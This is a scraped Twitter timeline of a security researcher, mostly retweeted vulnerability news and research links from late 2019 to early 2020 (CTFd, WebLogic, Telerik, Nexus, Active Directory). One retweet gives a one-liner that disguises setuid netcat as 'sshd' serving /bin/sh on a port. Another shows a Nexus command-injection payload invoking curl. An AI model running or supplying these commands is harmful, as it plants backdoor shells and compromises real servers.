Tweets by @testanull

  1. Retweeted
    Feb 1

    Attention CTF players (and organizers), CTFd v2.0.0 - v2.2.2 has a serious vulnerability (CVE-2020-7245) in which an attacker could perform account takeover using a leading-trailing on the Registration form. It has been fixed in v2.2.3. Make sure to update!

  2. Jan 31
  3. Retweeted
    Jan 25

    I'm working on a new project for Android reversers called Smali Debugger. It's like gdb but for Smali. It uses smalivm () for execution. Here's a quick video of me stepping through two similar methods.

  4. Retweeted
    Jan 18

    Big list of HTTP static server one-liners :

  5. Retweeted
    Jan 15

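    【Weblogic New Unserialization RCE】 CVE-2020-2546 T3 RCE CVE-2020-2551 IIOP RCE An attacker can remotely access remote interfaces on Weblogic over the IIOP protocol, which is enabled by default, and pass in malicious data to gain server privileges and remotely execute arbitrary code without authorization.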

  6. Jan 6

    Breaking PHP's mt_rand() with 2 values and no bruteforce

  7. Retweeted
    Jan 5

    I have 0 CVEs. I've found many many bugs, but I don't need a CVE to prove anything. If you seemingly think a CVE makes you l337, you need to rethink.

  8. Retweeted
    Jan 1

    RT if you get it, research it if you don't: mkdir /tmp/... cd /tmp/... cp `which nc.traditional` sshd chown root:root sshd chmod u+s sshd ./sshd -l -p 2020 -e /bin/sh

  9. Retweeted
    Dec 29, 2019
  10. Retweeted

    2019 is 99% complete.

  11. Retweeted
    Dec 27, 2019

    I've implemented a fuzzer for PHP: Fuzzing is a great way to find obscure bugs in parsing libraries...

  12. Retweeted
    Dec 19, 2019

    "whoopsie-daisy", part 3. This one is about PID recycling and how it can lead to a vulnerability if PIDs are accidentally used as authentication tokens.

  13. Retweeted
    Dec 13, 2019

    Just published a PoC exploit for CVE-2019-18935 (), RCE via insecure deserialization affecting Telerik UI. See full write-up below. Thanks to for discovering this issue, and for collaborating on exploit dev.

  14. Dec 16, 2019
  15. Dec 15, 2019
  16. Retweeted
    Dec 12, 2019

    VIDEO UPDATE: All 115 Briefings from 2019 have been uploaded to the Black Hat YouTube channel. All videos available here:

  17. Retweeted
    Dec 13, 2019

    The CVE-2019-18935 is a severe insecure deserialization vulnerability affecting UI. Understand its impact + learn to safely patch your software in this post from : (With thanks to + )

  18. Retweeted
    Dec 11, 2019

    When an attacker dumps NTDS.dit, they have user & computer hashes, including Domain Controller hashes. Create Silver Ticket w/ computer hash & regain full AD control: Mitigation: Force all computers to change pw every 1 day via GPO. More in link above

  19. Retweeted
    Dec 9, 2019

    CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475

  20. Retweeted
    Dec 8, 2019
